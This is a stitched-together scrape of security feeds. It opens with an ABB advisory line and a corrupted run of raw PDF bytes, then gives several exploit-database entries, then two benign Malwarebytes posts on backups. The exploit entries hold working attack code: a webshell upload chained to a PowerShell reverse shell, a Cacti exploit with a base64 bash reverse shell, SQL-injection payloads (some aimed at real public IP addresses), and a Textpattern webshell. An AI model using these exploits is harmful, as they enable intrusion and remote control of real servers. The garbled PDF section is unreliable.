Improper Input Validation vulnerability in ABB AC500 V2 PM5xx allows Client-Server Protocol Manipulation.This issue affects AC500 V2: from 2.0.0 before 2.8.6.

%PDF-1.4 %���� 1 0 obj << /Author (Ben Schroeter) /CreationDate (D:20230330131957+03'00') /Creator (PDF-XChange Office Addin) /CreatorTool (PDF-XChange Standard \$9.4 build 363\$ \[GDI\] \[Windows 10 Enterprise x64 \$Build 19044\$\]) /ModDate (D:20230330132003+03'00') /Producer (PDF-XChange Standard \$9.4 build 363\$ \[GDI\] \[Windows 10 Enterprise x64 \$Build 19044\$\]) /Subject (AC500 V2) /Title (Cyber Security Advisory) >> endobj 2 0 obj << /Metadata 3 0 R /Outlines 4 0 R /Pages 5 0 R /Type /Catalog >> endobj 3 0 obj << /Length 3495 /Subtype /XML /Type /Metadata >> stream application/pdf Cyber Security Advisory AC500 V2 Ben Schroeter uuid:a57b4ba8-a272-4bde-add4-d27b2fe96f47 uuid:5b146c0d-1d52-43f0-9222-20a70987ad69 PDF-XChange Office Addin 2023-03-30T13:19:57+03:00 2023-03-30T13:20:03+03:00 PDF-XChange Standard (9.4 build 363) \[GDI\] \[Windows 10 Enterprise x64 (Build 19044)\] PDF-XChange Standard (9.4 build 363) \[GDI\] \[Windows 10 Enterprise x64 (Build 19044)\] endstream endobj 4 0 obj << /Count 28 /First 6 0 R /Last 7 0 R >> endobj 5 0 obj << /Count 7 /Kids \[8 0 R 9 0 R 10 0 R 11 0 R 12 0 R 13 0 R 14 0 R\] /Type /Pages >> endobj 6 0 obj << /A << /D \[9 0 R /XYZ 64 749.5 0\] /S /GoTo >> /C \[0 0 0\] /Next 15 0 R /Parent 4 0 R /Title (Purpose) >> endobj 7 0 obj << /A << /D \[14 0 R /XYZ 64 315.5 0\] /S /GoTo >> /C \[0 0 0\] /Parent 4 0 R /Prev 16 0 R /Title (Revision history) >> endobj 8 0 obj << /Contents 17 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 9 0 obj << /Contents 21 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 10 0 obj << /Annots \[23 0 R 24 0 R 25 0 R 26 0 R 27 0 R 28 0 R\] /Contents 29 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 11 0 obj << /Contents 30 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 12 0 obj << /Annots \[31 0 R\] /Contents 32 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 13 0 obj << /Contents 33 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 14 0 obj << /Annots \[34 0 R 35 0 R 36 0 R 37 0 R 38 0 R 39 0 R 40 0 R 41 0 R 42 0 R\] /Contents 43 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 15 0 obj << /A << /D \[9 0 R /XYZ 64 445 0\] /S /GoTo >> /C \[0 0 0\] /Next 44 0 R /Parent 4 0 R /Prev 6 0 R /Title (Affected products) >> endobj 16 0 obj << /A << /D \[14 0 R /XYZ 64 424.5 0\] /S /GoTo >> /C \[0 0 0\] /Next 7 0 R /Parent 4 0 R /Prev 45 0 R /Title (Support) >> endobj 17 0 obj << /Filter /FlateDecode /Length 3036 >> stream xڍYK��F��WԱ{1d��Wn������E��#Q#&��%)�N~��Mr;Hv��z~U�t,�L^����;��y\]��u�yg�)a{Jp�R�G���zI���ͳ���7����i�,��V�U���" �6s�\*�V�,�7P����,����ϊj�����v���yFZ�Α�KY�1�9��3:�!��u���Yf&ÜϺ��D��:&��uN+v�'X�E� "?M���:�=S1B�)~����u�y9Y;H)�Gp�BPQ���)8Jv� MI� (ȽdFND !r�fA�ZP�����Oy2f�5�+S�����M��rjٷ%� �%P�3<�F�Z|�8۔ ,!9�r�rO�UҘp���A-,q�0���i���H9�-11��h+a��jށ�dm���"��2�� �����|�䋒�( �@f�hg�W�A.U�\[@$d�W+JE�\*�$�\[A!�\\S��(�,��:\\:Ia�Q�A�ܯ%��պZ�Ha'3�ż�\`4a^��+i-�9҂����hռ�4����H?\\P!)��FJi��.�a� ��;G�q��� V¿ �| v��R� �\[ �4o��2�803�+��z-A��{L�^��ū8�<��\[���c�\_e\\�kK�:>�^σ�S\]�r^��r�1���a�/x��^���i�+��\\OK\_�i�0�5�+���q\\\[�a�I��

CVE-2022-3192

Judging Management System version 1.0 suffers from bypass and remote shell upload vulnerabilities.

# Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE)# Date: 12/11/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 on XAAMP serverimport requests,argparse,re,time,base64import urllib.parsefrom colorama import (Fore as F,Back as B,Style as S)from bs4 import BeautifulSoupBANNER = """╔═══════════════════════════════════════════════════════════════════════════════════════════════════════╗║ Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE) ║╚═══════════════════════════════════════════════════════════════════════════════════════════════════════╝"""def argsetup(): desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)' parser = argparse.ArgumentParser(description=desc) parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True) parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True) parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True) args = parser.parse_args() return args# Performs Auth bypass in order to get the admin cookiedef auth_bypass(args): print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...") session = requests.Session() loginUrl = f"{args.target}/login.php" username = """' OR 1=1-- -""" password = "randomvalue1234" data = {'username': username, 'password': password} login = session.post(loginUrl,verify=False,data=data) admin_cookie = login.cookies['PHPSESSID'] print(F.GREEN+"[+] Admin cookies obtained !!!") return admin_cookie# Checks if the file has been uploaded to /uploads directorydef check_file(args,cookie): uploads_endpoint = f"{args.target}/uploads/" cookies = {'PHPSESSID': f'{cookie}'} req = requests.get(uploads_endpoint,verify=False,cookies=cookies) soup = BeautifulSoup(req.text,features='html.parser') files = soup.find_all("a") for i in range (len(files)): match = re.search(".*-shelljudgesystem\.php",files[i].get('href')) if match: file = files[i].get('href') print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file) return file return Nonedef file_upload(args,cookie): now = int(time.time()) endpoint = f"{args.target}/edit_organizer.php" cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'} get_req = requests.get(endpoint,verify=False,cookies=cookies) soup = BeautifulSoup(get_req.text,features='html.parser') username = soup.find("input",{"name":"username"}).get('value') admin_password = soup.find("input",{"id":"password"}).get('value') print(F.GREEN + "[+] Admin username: " + username) print(F.GREEN + "[+] Admin password: " + admin_password) # Multi-part request file_dict = { 'fname':(None,"Random"), 'mname':(None,"Random"), 'lname':(None,"Random"), 'email':(None,"ranom@mail.com"), 'pnum':(None,"014564343"), 'cname':(None,"Random"), 'caddress':(None,"Random"), 'ctelephone':(None,"928928392"), 'cemail':(None,"company@mail.com"), 'cwebsite':(None,"http://company.com"), 'file':("shelljudgesystem.php","<?php system($_REQUEST['cmd']) ?>","application/octet-stream"), 'username':(None,f"{admin_password}"), 'passwordx':(None,f"{admin_password}"), 'password2x':(None,f"{admin_password}"), 'password':(None,f"{admin_password}"), 'update':(None,"") } req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict)def exploit(args,cookie,file): payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """ uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}" cookies = {'PHPSESSID': f'{cookie}'} print(F.GREEN + "\n[+] Enjoy your reverse shell ") requests.get(uploads_endpoint,verify=False,cookies=cookies) if __name__ == '__main__': print(F.CYAN + BANNER) args = argsetup() cookie=auth_bypass(args=args) file_upload(args=args,cookie=cookie) file_name=check_file(args=args,cookie=cookie) if file_name is not None: exploit(args=args,cookie=cookie,file=file_name) else: print(F.RED + "[!] File not found")

Judging Management System 1.0 Shell Upload

Judging Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for login bypass.

    # Exploit Title: Judging Management System v1.0 - Authentication Bypass# Date: 12/11/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 on XAAMP server# Vulnerability: An attacker can bypass login page and access to dashboard page# Vulnerable file: login.php# Exploit:1) Go to: http://localhost/php-jms/index.php2) As username use this payload: 'or 1=1-- -3) Use random words for passwordPOST /php-jms/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 37Origin: http://localhostConnection: closeReferer: http://localhost/php-jms/index.phpCookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=%27or+1%3D1--+-&password=asa

Judging Management System 1.0 SQL Injection

EQ Enterprise Management System version 2.2.0 suffers from a remote SQL injection vulnerability.

    Exploit Title: EQ Enterprise management system v2.2.0 - SQL InjectionDate: 2022.12.7Exploit Author: TLFVendor Homepage: https://www.yiquantech.com/pc/about.htmlSoftware Link(漏洞影响应用下载链接): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/Version: EQ v1.5.31 to v2.2.0Tested on: windows 10CVE : CVE-2022-45297 POC:POST /Account/Login HTTP/1.1 Host: 121.8.146.131 User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Content-Length: 118 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg Origin: http://121.8.146.131Referer: http://121.8.146.131/Account/Login X-Requested-With: XMLHttpRequest Accept-Encoding: gzipRememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27

EQ Enterprise Management System 2.2.0 SQL Injection

CoolerMaster MasterPlus version 1.8.5 suffers from an unquoted service path vulnerability.

    # Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path# Date: 11/17/2022# Exploit Author: Damian Semon Jr (Blue Team Alpha)# Version: 1.8.5# Vendor Homepage: https://masterplus.coolermaster.com/# Software Link: https://masterplus.coolermaster.com/# Tested on: Windows 10 64x# Step to discover the unquoted service path:wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """CoolerMaster MasterPlus Technology Service  MPService  C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe  Auto# Info on the service:C:\>sc qc MPService[SC] QueryServiceConfig SUCCESSSERVICE_NAME: MPService        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : CoolerMaster MasterPlus Technology Service        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem                        #Exploit:A successful exploit of this vulnerability could allow a threat actor to execute code during startup or reboot with System privileges. Drop payload "Program.exe" in C:\ and restart service or computer to trigger. Ex: (C:\Program.exe)

CoolerMaster MasterPlus 1.8.5 Unquoted Service Path

WordPress WooCommerce plugin version 7.1.0 suffers from a remote code execution vulnerability.

# Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)# Date: 2022-12-07# Author: Milad Karimi# Vendor Homepage: https://wordpress.org/plugins/woocommerce# Software Link: https://wordpress.org/plugins/woocommerce# Tested on: windows 10 , firefox# Version: 7.1.0# CVE : N/A# Description:simple, easy to use jQuery frontend to php backend that pings variousdevices and changes colors from green to red depending on if device isup or down.# PoC :http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.phphttp://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php# Vulnerabile code: 95: $classname $classname($post_id); 94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple'); 92: ⇓ function save($post_id, $post) 93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type'])); 92: ⇓ function save($post_id, $post)

WordPress WooCommerce 7.1.0 Remote Code Execution

Cacti version 1.2.22 suffers from a remote command execution vulnerability.

# Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)# Exploit Author: Riadh BOUCHAHOUA# Discovery Date: 2022-12-08 # Vendor Homepage: https://www.cacti.net/# Software Links : https://github.com/Cacti/cacti# Tested Version: 1.2.2x <= 1.2.22# CVE: CVE-2022-46169# Tested on OS: Debian 10/11#!/usr/bin/env python3import randomimport httpx, urllibclass Exploit: def __init__(self, url, proxy=None, rs_host="",rs_port=""): self.url = url self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy) self.rs_host = rs_host self.rs_port = rs_port def exploit(self): # cacti local ip from the url for the X-Forwarded-For header local_cacti_ip = self.url.split("//")[1].split("/")[0] headers = { 'X-Forwarded-For': f'{local_cacti_ip}' } revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'" import base64 b64_revshell = base64.b64encode(revshell.encode()).decode() payload = f";echo {b64_revshell} | base64 -d | bash -" payload = urllib.parse.quote(payload) urls = [] # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell) for host_id in range(1,100): for local_data_ids in range(1,100): urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}") for url in urls: r = self.session.get(url,headers=headers) print(f"{r.status_code} - {r.text}" ) pass def random_user_agent(self): ua_list = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0", ] return random.choice(ua_list)def parse_args(): import argparse argparser = argparse.ArgumentParser() argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)") argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True) argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True) return argparser.parse_args()def main() -> None: # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL args = parse_args() e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port) e.exploit()if __name__ == "__main__": main()

Cacti 1.2.22 Remote Command Execution

Textpattern version 4.8.8 suffers from an authenticated remote code execution vulnerability.

# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://textpattern.com/# Version : 4.8.8# Tested on: windows 11 xammp | Kali linux# Category: WebApp# Google Dork: intext:"Published with Textpattern CMS"# Date: 10/09/2022######### Description ########## Step 1: Login admin account and go settings of site# Step 2: Upload a file to web site and selecet the rce.php# Step3 : Upload your webshell that's it...######### Proof of Concept ########========>>> START REQUEST <<<=========############# POST REQUEST (FILE UPLOAD) ############################## (1)POST /textpattern/index.php?event=file HTTP/1.1Host: localhostContent-Length: 1038sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJuX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/textpattern/index.php?event=fileAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0adminConnection: close------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="fileInputOrder"1/1------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="app_mode"async------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="MAX_FILE_SIZE"2000000------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="event"file------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="step"file_insert------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="id"------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="_txp_token"16ea3b64ca6379aee9599586dae73a5d------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="thefile[]"; filename="rce.php"Content-Type: application/octet-stream<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>------WebKitFormBoundaryMgUEFltFdqBVvdJu--############ POST RESPONSE (FILE UPLOAD) ######### (1)HTTP/1.1 200 OKDate: Sat, 10 Sep 2022 15:28:57 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6X-Powered-By: PHP/8.1.6X-Textpattern-Runtime: 35.38 msX-Textpattern-Querytime: 9.55 msX-Textpattern-Queries: 16X-Textpattern-Memory: 2893 kBContent-Length: 270Connection: closeContent-Type: text/javascript; charset=utf-8___________________________________________________________________________________________________________________________________________________############ REQUEST TO THE PAYLOAD ############################### (2)GET /files/c.php?cmd=whoami HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: txp_login_public=4353608be0adminConnection: close############ RESPONSE THE PAYLOAD ############################### (2)HTTP/1.1 200 OKDate: Sat, 10 Sep 2022 15:33:06 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6X-Powered-By: PHP/8.1.6Content-Length: 29Connection: closeContent-Type: text/html; charset=UTF-8<pre>alpernae\alperen</pre>========>>> END REQUEST <<<=========

Textpattern 4.8.8 Remote Code Execution

Categories: News
Categories: Ransomware
Tags: World Backup Day

Backups are your last line of defense against ransomware, if they work.



(Read more...)




The post 3 tips for creating backups your organization can rely on when ransomware strikes appeared first on Malwarebytes Labs.

Backups are an organization's last line of defense against ransomware, because comprehensive, offline, offsite backups give you a chance to restore or rebuild your computers without paying a criminal for a decryption key.

Unfortunately, many organizations don't realize how important it is to make backups until it's too late. And it's all-too-common for those that do take regular backups to discover too late that they aren't fit for purpose.

Why? Because backups are hard to get right.

In September 2021, Malwarebytes spoke with Matt Crape from VMWare to find out why backups are so hard, why they fail, and what to do about it. This World Backup Day, we thought we'd revisit his advice for creating a more consistent, stable, and resilient backup process. Here are three essential things every organization can ponder today.

**1\. Know what you're trying to achieve**

Good backups start with a clear understanding of what your organization needs them to do. From that, you can determine what needs to be backed up, why, how frequently, and for how long. The answers to those questions will depend on how much data you have, how often it changes, whether you can live without any of it, whether you have remote employees, the implications of legal requirements such as GDPR, and a wide range of other factors.

Every organization is different, so the "right" answers to those questions will be unique for each. Organizations also change over time so decisions about what you need from your backups need to be reviewed often enough to keep up.

When thinking about ransomware, a good starting point is to imagine what you would need to do if all of your computers were rendered useless and you had to rebuild them from scratch. What's your approach, will you restore everything from backups, or recreate applications and operating systems from a "golden" disk image? If that's your plan, do you know how long it will take to reinstate every computer in your organization? Can your business survive that much downtime?

**2\. Keep a backup offline and offsite**

Modern ransomware attacks are carried out by gangs who break into company networks, prepare the ground for their attack, and then run their ransomware manually. Gangs can spend weeks inside a network looking to increase the chances of their attack succeeding, and backups are a prime target. If the attackers can find them, they will delete them.

That's exactly what happened when a ransomware gang attacked the Northshore School District in Washington state. In an instructive and painfully honest episode of our Lock and Code podcast, Systems administrator Ski Kacoroski told us “we find out, at about 4 or 5 hours after the attack, that our backup system is completely gone.” Without effective backups, Kacoroski was left with a mountain to climb: “It started to really sink in that I’m going to have to rebuild 180 Windows servers, and more importantly, rebuild Active Directory from scratch, with all those accounts and groups, and everything in it. That part really, really hurt us.”

The lesson of the Northshore attack and many others is that it's vital to keep at least one recent copy of your data offsite and offline, beyond the reach of an attacker who has domain administrator access to your network

CISA recommends the tried and tested 3-2-1 rule of backups: 3 copies of your data, on 2 different media, with 1 held offsite, which provides resilience against a range of different risks, including ransomware.

**3\. Test your backups**

A backup is only as useful as the data that can be successfully restored from it. So while it's useful to know that your backup solution is running and recording data, the only way to be sure it works is to try reading data from it.

A true acid test is to prove to yourself that in the event of a ransomware attack, natural disaster, fire or flood, that you can restore your critical business systems from scratch. Simply having the data may not be enough. Companies grow organically and unless they are very new, their networks are likely to have been built over time rather than in one go. This can create interdependencies where system A requires system B and system B requires system A, and so on.

And keep in mind that the best judge of whether data has been restored successfully is the person who relies on that data—so keep them engaged during the testing.

**Learn more**

To learn more about why backups fail when you need them, and how to improve your chances of success, listen to the full podcast with Matt Crape, embedded below.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

3 tips for creating backups your organization can rely on when ransomware strikes

Categories: Personal
Because backups are the dental floss of cybersecurity—the thing that everyone knows they should do, that everyone intends to do, that nobody actually does.



(Read more...)




The post 3 tips to raise your backup game appeared first on Malwarebytes Labs.

Happy World Backup Day everyone!

What, you didn't know it was World Backup Day? Hmmm, perhaps that's not a surprise. If there was an award for "most overlooked really important thing in computing", backups would win. Every year.

So let's put that right this year and spend a minute or two of World Backup Day thinking about backups. Backups are great! Having backups is like having a do-over for your mistakes, and who hasn't wished for that? And they can keep you safe too. Good computer security means creating layers of protection that overlap and cover each others' backs. The final layer is your backups. They're a "get out of jail free" card you can play if any of your files are destroyed, deleted, or corrupted by malware.

To get you off on the right foot we've got three tips: A beginner tip, an intermediate tip, and an advanced tip.

**1\. Make backups**

Yes, our first tip really is "make backups". Why? Because backups are the dental floss of cybersecurity—the thing that everyone knows they should do, that everyone _intends_ to do, that nobody actually does.

You need to floss your computer, every day. We don't care how you do it: You can use the cloud, put your files on a USB stick, plug in an external hard drive, burn your data to a disk (ask your parents), copy them to an FTP site (ask your grandparents), or print them out and bind them in a book for all we care. All we ask is that you make a copy of your data, and then make making copies of your data a habit.

The only backup you'll ever regret is the one you didn't make.

**2\. Make them automatic**

Once you decide that you're going to make regular copies of your data you are, in all likelihood, going to get bored of doing it and slip up on your rigorous, well-intentioned schedule. Humans just aren't good at doing the same thing, the same way, every day. But you know what is? A computer.

So, our intermediate tip is to let the computer take the strain of remembering what you want to backup and when. They love that stuff.

Windows and macOS both come with backup software included, each of which is perfectly on-brand for your platform of choice. The Windows backup solution has a boring and sensible name. It's called Backup and Restore. On Mac you'll be using a Time Machine, because Apple lets its marketing department in the room when things are being named. As you'd expect, if you're a Linux user there are a bewildering number of options to choose from. If you're blinded by overchoice, check out Amanda.

**3\. Make sure they work**

If you've followed tip two and automated your backups then you can sit back and relax right? Sure, you can. But if you want to know _for sure_ that your backup solution will be there for when you need it most, you need to test it. After all, a backup is only as useful as the data you can actually restore from it.

Anyone who works with computers knows that assumption is the mother of all f\*\*\* ups, so don't assume your backups work, prove they do. Pick a file you really care about and go get a copy of it from your backups. Better yet, if you have a directory where you keep lots of important files, restore that. Not only will that prove to you that your backups can dig you out of trouble if they ever need to, you'll get a feel for how slow that process can be if you're backing up over Wi-Fi. Understanding that restoring a lot of files from a backup can be a lengthy process will help you set your expectations and manage your stress levels if you ever need to.

**Pat yourself on the back**

Whether you made it all the way to rolling out tip three, or you stopped at one, we applaud you. Your digital life is now more resilient than it was, which means you'll be better able to weather hardware failures, accidental deletions, and malware outbreaks. 

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#windows